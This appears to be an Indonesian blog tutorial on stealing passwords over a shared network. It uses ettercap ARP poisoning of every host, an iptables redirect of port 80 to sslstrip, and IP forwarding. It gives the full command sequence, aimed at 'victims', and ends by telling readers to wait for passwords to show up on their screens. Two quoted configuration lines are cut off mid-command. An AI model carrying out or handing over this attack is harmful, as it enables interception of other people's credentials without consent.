Sniffing menggunakan sslstrip dengan ettercap.

Selamat siang salam sejahtera untuk kita semua, tanp basa basi langsung aja...

Langkah pertama download ettercapnya, kalo udah punya yang enggak usah ehehe,
langkah selanjutnya download sslstripnya caranya DISINI .
Kalo sudah kita lanjutkan perintah-perintahnya..

Buka terminal/konsole .ketikan ..

root@johannes:~# nano /etc/etter.conf

Kemudian kita edit dulu konfigurasinya menggunakan editor nano. dan pada bagian redir_command kita hilangkan tanda pagar di bagian iptables agar ettercap mengaktifkan fungsi redir_command

# if you use iptables:
redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport 
redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport$



kalo sudah kita tutup dan save dengan menekan CTRL + x kemudian memilih Y dan ENTER, kemudian melakukan setting pada firewall kita agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS korban ke HTTP, dengan perintah

root@boiem:~# iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000

 selanjutnya kita aktifkan sslstrip di tab konsole baru dengan perintah

root@johannes:~# sslstrip -a -k -f

 kemudian kita aktifkan ettercap di tab baru sebagai penjaring password dan alat untuk melakukan poisoning ARP, dibagian inilah yang membedakan antara sniffing 1 target dan sniffing massal, dengan perintah


root@johannes:~# ettercap -T -q -i wlan0 -M ARP // //


dimana opsi -i wlan0 adalah opsi untuk memilih jenis interface yang kita gunakan, saya menggunakan koneksi wireless, jadi saya menggunakan wlan0

Selanjutnya pada bagian utamanya yang tidak boleh kita lupakan adalah ip_forward dengan perintah di TAB konsole baru untuk menghindari kesalahan yang sering terjadi pada saat memberikan perintah ini di awalan sebelum konfigurasi pada firewall:

 root@johannes:~# echo 1 > /proc/sys/net/ipv4/ip_forward


 ok deh.. udah cukup jelas kan penjelasan yang saya berikan??
kalian tinggal tunggu aja password berkeliaran dimonitor kalian..hehehe.
kalo kurang jelas silahkan comment dibawah ini..!!

0 komentar: